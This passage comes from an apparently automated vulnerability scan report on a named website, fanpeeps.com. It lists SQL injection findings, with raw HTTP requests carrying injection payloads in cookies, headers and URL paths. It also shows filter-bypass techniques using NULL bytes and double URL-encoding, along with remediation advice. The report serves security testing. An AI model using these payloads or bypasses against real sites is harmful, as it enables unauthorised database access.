Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17916

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.31. http://fanpeeps.com/greybox/gb_scripts.js [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /greybox/gb_scripts.js

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload " was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /greybox/gb_scripts.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;
Referer: http://www.google.com/search?hl=en&q="

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:30 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17203

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.32. http://fanpeeps.com/greybox/gb_scripts.js [__utma cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /greybox/gb_scripts.js

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payload ',0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the __utma cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /greybox/gb_scripts.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2',0,0,0)waitfor%20delay'0%3a0%3a20'--; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:14 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17455

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.33. http://fanpeeps.com/greybox/gb_scripts.js [__utmc cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /greybox/gb_scripts.js

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payload 11885055%20or%201%3d1--%20 was submitted in the __utmc cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /greybox/gb_scripts.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=18189393611885055%20or%201%3d1--%20; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:37 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17300

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.34. http://fanpeeps.com/greybox/gb_scripts.js [__utmz cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /greybox/gb_scripts.js

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /greybox/gb_scripts.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%00'; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:43:52 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17371

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /greybox/gb_scripts.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%00''; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:43:52 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 50419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.35. http://fanpeeps.com/greybox/gb_scripts.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://fanpeeps.com
Path:   /greybox/gb_scripts.js

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /greybox/gb_scripts.js?1%2527=1 HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:45:30 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
</b>: Invalid argument supplied for foreach() in <b>
...[SNIP]...

Request 2

GET /greybox/gb_scripts.js?1%2527%2527=1 HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:45:33 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 50419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.36. http://fanpeeps.com/greybox/gb_styles.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /greybox/gb_styles.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /greybox',0)waitfor%20delay'0%3a0%3a20'--/gb_styles.css HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:43 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17383

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.37. http://fanpeeps.com/greybox/gb_styles.css [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /greybox/gb_styles.css

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /greybox/gb_styles.css HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;
Referer: http://www.google.com/search?hl=en&q='

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:29 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17203

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.38. http://fanpeeps.com/greybox/gb_styles.css [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /greybox/gb_styles.css

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /greybox/gb_styles.css HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:22 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17435

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /greybox/gb_styles.css HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:29 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 45737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.39. http://fanpeeps.com/greybox/gb_styles.css [__utma cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /greybox/gb_styles.css

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payload ',0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the __utma cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /greybox/gb_styles.css HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2',0,0)waitfor%20delay'0%3a0%3a20'--; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:16 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 18095

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.40. http://fanpeeps.com/greybox/gb_styles.css [__utmb cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://fanpeeps.com
Path:   /greybox/gb_styles.css

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /greybox/gb_styles.css HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380';

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:45:04 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
</b>: Invalid argument supplied for foreach() in <b>
...[SNIP]...

Request 2

GET /greybox/gb_styles.css HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380'';

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:45:04 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 91517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.41. http://fanpeeps.com/greybox/gb_styles.css [__utmc cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /greybox/gb_styles.css

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __utmc cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /greybox/gb_styles.css HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936'; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:37 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17408

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.42. http://fanpeeps.com/greybox/gb_styles.css [__utmz cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /greybox/gb_styles.css

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the __utmz cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /greybox/gb_styles.css HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)')waitfor%20delay'0%3a0%3a20'--; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:00 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17281

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.43. http://fanpeeps.com/media/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://fanpeeps.com
Path:   /media/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /media'/ HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:29 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
</b>: Invalid argument supplied for foreach() in <b>
...[SNIP]...

Request 2

GET /media''/ HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:32 GMT
